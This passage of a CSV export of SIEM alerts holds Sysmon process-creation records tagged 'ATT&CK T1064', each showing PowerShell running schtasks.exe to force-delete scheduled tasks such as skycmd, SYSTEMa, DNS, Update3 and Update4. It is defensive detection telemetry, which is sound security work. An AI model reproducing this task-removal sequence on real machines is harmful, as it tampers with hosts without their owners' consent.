/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.048720300Z"",""eventRecordID"":""2820"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.045\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-0010f6cd2100}\r\nProcessId: 3668\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN skycmd /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.045"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-0010f6cd2100}"",""processId"":""3668"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN skycmd /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.838",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.017 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-00103fcc2100} +ProcessId: 1720 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEMa /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.019921300Z"",""eventRecordID"":""2819"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.017\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-00103fcc2100}\r\nProcessId: 1720\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEMa /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.017"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-00103fcc2100}"",""processId"":""1720"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEMa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.823",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.985 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-0010d1c92100} +ProcessId: 2432 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.988020300Z"",""eventRecordID"":""2818"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.985\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-0010d1c92100}\r\nProcessId: 2432\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.985"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-0010d1c92100}"",""processId"":""2432"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.791",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.952 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-00101cc72100} +ProcessId: 4188 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN SYSTEM /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.958315700Z"",""eventRecordID"":""2817"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.952\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-00101cc72100}\r\nProcessId: 4188\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN SYSTEM /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.952"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-00101cc72100}"",""processId"":""4188"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN SYSTEM /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.775",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.898 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-00108ac42100} +ProcessId: 6072 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DNS /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.901029000Z"",""eventRecordID"":""2816"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.898\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-00108ac42100}\r\nProcessId: 6072\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DNS /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.898"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-00108ac42100}"",""processId"":""6072"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DNS /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.760",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.861 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-0010f9c12100} +ProcessId: 1344 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update4 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.865950800Z"",""eventRecordID"":""2815"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.861\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-0010f9c12100}\r\nProcessId: 1344\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:31.861"",""processGuid"":""{df9fc3d3-b397-5ecf-0000-0010f9c12100}"",""processId"":""1344"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update4 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:01.744",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:31.820 +ProcessGuid: {df9fc3d3-b397-5ecf-0000-0010c6bf2100} +ProcessId: 1928 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:31.822709300Z"",""eventRecordID"":""2814"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:31.820\r\nProcessGuid: {df9fc3d3-b397-5ecf-0000-0010c6bf2100}\r\nProcessId: 1928\r\nImage: 